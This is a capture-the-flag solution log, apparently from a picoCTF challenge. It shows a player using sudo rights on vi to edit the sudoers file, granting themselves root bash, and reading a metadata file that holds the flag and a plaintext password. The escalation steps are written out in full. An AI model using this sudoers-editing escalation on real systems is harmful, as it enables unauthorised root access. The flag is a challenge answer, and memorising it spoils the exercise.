misc/permissions

misc/permissions/output.txt

@@ -0,0 +1,69 @@
+$ ssh -o StrictHostKeychecking=no -p 50911 picoplayer@saturn.picoctf.net
+picoplayer@saturn.picoctf.net's password:
+Warning: Permanently added '[saturn.picoctf.net]:50911' (ED25519) to the list of known hosts.
+picoplayer@saturn.picoctf.net's password:
+Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 6.5.0-1023-aws x86_64)
+
+ * Documentation:  https://help.ubuntu.com
+ * Management:     https://landscape.canonical.com
+ * Support:        https://ubuntu.com/advantage
+
+This system has been minimized by removing packages and content that are
+not required on a system that users do not log into.
+
+To restore this content, you can run the 'unminimize' command.
+
+The programs included with the Ubuntu system are free software;
+the exact distribution terms for each program are described in the
+individual files in /usr/share/doc/*/copyright.
+
+Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
+applicable law.
+
+picoplayer@challenge:~$ ls -la /
+total 0
+drwxr-xr-x   1 root   root     74 Sep  6 18:11 .
+drwxr-xr-x   1 root   root     74 Sep  6 18:11 ..
+-rwxr-xr-x   1 root   root      0 Sep  6 18:11 .dockerenv
+lrwxrwxrwx   1 root   root      7 Mar  8  2023 bin -> usr/bin
+drwxr-xr-x   2 root   root      6 Apr 15  2020 boot
+d---------   1 root   root     27 Aug  4  2023 challenge
+drwxr-xr-x   5 root   root    340 Sep  6 18:11 dev
+drwxr-xr-x   1 root   root     23 Sep  6 18:11 etc
+drwxr-xr-x   1 root   root     24 Aug  4  2023 home
+lrwxrwxrwx   1 root   root      7 Mar  8  2023 lib -> usr/lib
+lrwxrwxrwx   1 root   root      9 Mar  8  2023 lib32 -> usr/lib32
+lrwxrwxrwx   1 root   root      9 Mar  8  2023 lib64 -> usr/lib64
+lrwxrwxrwx   1 root   root     10 Mar  8  2023 libx32 -> usr/libx32
+drwxr-xr-x   2 root   root      6 Mar  8  2023 media
+drwxr-xr-x   2 root   root      6 Mar  8  2023 mnt
+drwxr-xr-x   2 root   root      6 Mar  8  2023 opt
+dr-xr-xr-x 392 nobody nogroup   0 Sep  6 18:11 proc
+drwx------   1 root   root     43 Sep  6 18:22 root
+drwxr-xr-x   1 root   root     66 Sep  6 18:22 run
+lrwxrwxrwx   1 root   root      8 Mar  8  2023 sbin -> usr/sbin
+drwxr-xr-x   2 root   root      6 Mar  8  2023 srv
+dr-xr-xr-x  13 nobody nogroup   0 Sep  6 18:11 sys
+drwxrwxrwt   1 root   root      6 Aug  4  2023 tmp
+drwxr-xr-x   1 root   root     18 Mar  8  2023 usr
+drwxr-xr-x   1 root   root     17 Mar  8  2023 var
+picoplayer@challenge:~$ sudo -l
+[sudo] password for picoplayer:
+Matching Defaults entries for picoplayer on challenge:
+    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+User picoplayer may run the following commands on challenge:
+    (ALL) /usr/bin/vi
+picoplayer@challenge:~$ sudo vi /etc/sudoers.d/
+README      picoplayer
+picoplayer@challenge:~$ sudo vi /etc/sudoers.d/picoplayer
+picoplayer@challenge:~$ sudo -l
+Matching Defaults entries for picoplayer on challenge:
+    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+User picoplayer may run the following commands on challenge:
+    (ALL) /usr/bin/vi
+    (ALL) /usr/bin/bash
+picoplayer@challenge:~$ sudo bash
+root@challenge:/home/picoplayer# cat /challenge/metadata.json
+{"flag": "picoCTF{uS1ng_v1m_3dit0r_f6ad392b}", "username": "picoplayer", "password": "e3pn6lmvHt"}root@challenge:/home/picoplayer#